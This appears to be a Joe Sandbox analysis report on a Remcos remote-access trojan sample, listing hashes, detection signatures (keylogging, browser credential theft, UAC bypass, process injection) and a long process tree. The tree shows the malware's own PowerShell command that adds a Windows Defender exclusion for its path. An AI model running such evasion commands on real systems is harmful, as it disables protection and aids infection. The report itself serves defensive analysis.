Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4XYAW8PbZH.exe

Overview

General Information

Sample name:4XYAW8PbZH.exe
renamed because original name is a hash value
Original sample name:4A9440BAA61BE8363A372B0BBC5933AD.exe
Analysis ID:1584203
MD5:4a9440baa61be8363a372b0bbc5933ad
SHA1:9aa5380dc87829c6fa22e9029cadcab9f6221ef9
SHA256:51c0bcbc40451c10e3b56df10853156378e8dbfb32ee63ea936737d42818822c
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4XYAW8PbZH.exe (PID: 6976 cmdline: "C:\Users\user\Desktop\4XYAW8PbZH.exe" MD5: 4A9440BAA61BE8363A372B0BBC5933AD)
    • powershell.exe (PID: 2536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 4XYAW8PbZH.exe (PID: 2816 cmdline: "C:\Users\user\Desktop\4XYAW8PbZH.exe" MD5: 4A9440BAA61BE8363A372B0BBC5933AD)
      • graias.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: 4A9440BAA61BE8363A372B0BBC5933AD)
        • powershell.exe (PID: 7304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7576 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • graias.exe (PID: 7328 cmdline: "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: 4A9440BAA61BE8363A372B0BBC5933AD)
          • svchost.exe (PID: 7412 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 7824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2300,i,10737837625504977776,1997224637472770813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2012,i,4138460331120134385,5683384739135737573,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8600 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 9032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,2517950207159565068,10782540892853908230,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8216 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,683593662308323729,9862283109921041436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7144 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 5220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=828 --field-trial-handle=1136,i,5921432477754910368,13753575883471156045,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,17133631053466548675,5917926669792758127,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 4548 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1908,i,16046133886444858587,11187754230774806872,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 5064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,5631293592904426678,1728656617054090218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9172 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1152,i,8013400789958701554,8044825980928044458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 7572 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7816 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 2364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 5840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1972,i,9724548607629697657,13638253049410839489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1964,i,11798321828357005052,16972695017880113129,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8808 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 2088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,12758286000912440692,11284502875771047049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1944,i,4936340759003262573,15814975481951039996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8220 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 7272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,3689067430776497247,15300495909368681371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,8812933395650124059,17698073702536386733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 1716 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 6228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1936,i,2605296248091638972,4924302696092150325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 5660 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1980,i,15377228353991002800,792711668187999877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8256 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 2160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1996,i,306334268389520684,17870841813551360438,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 5768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1992,i,3378677205698214136,1924167881851413353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 1352 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 5628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=868 --field-trial-handle=2020,i,696290173973552029,16877605372930337061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1956,i,12129368793975855261,4084447202771776108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7572 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 7484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,5375429189451205296,3038177405675182667,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 9624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9812 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,8051270230576347227,15887782478097552568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9880 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 10092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9248 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,5804494753339918936,5217131698543492645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 9716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 4420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1136,i,1930181798274664567,3542273984303113262,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7108 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
